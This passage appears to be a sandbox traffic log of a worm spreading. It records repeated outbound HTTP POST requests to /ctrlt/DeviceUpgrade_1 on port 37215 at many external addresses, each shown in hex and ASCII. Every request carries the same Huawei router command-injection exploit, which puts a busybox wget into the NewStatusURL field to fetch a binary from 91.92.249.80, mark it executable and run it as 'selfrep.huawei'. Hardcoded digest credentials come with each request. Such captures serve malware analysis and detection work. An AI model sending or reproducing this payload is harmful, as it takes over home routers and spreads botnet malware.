                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          363192.168.2.2342090197.125.199.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178452969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          364192.168.2.2339264157.243.46.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178452969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          365192.168.2.2352498157.184.48.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178472042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          366192.168.2.2355322157.136.215.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178472042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          367192.168.2.2340342157.11.238.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178472042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          368192.168.2.2333370157.191.3.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178488016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          369192.168.2.234574062.142.247.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178489923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          370192.168.2.235187441.208.128.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178494930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          371192.168.2.2348700179.29.98.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178513050 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          372192.168.2.234793641.150.90.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178519964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
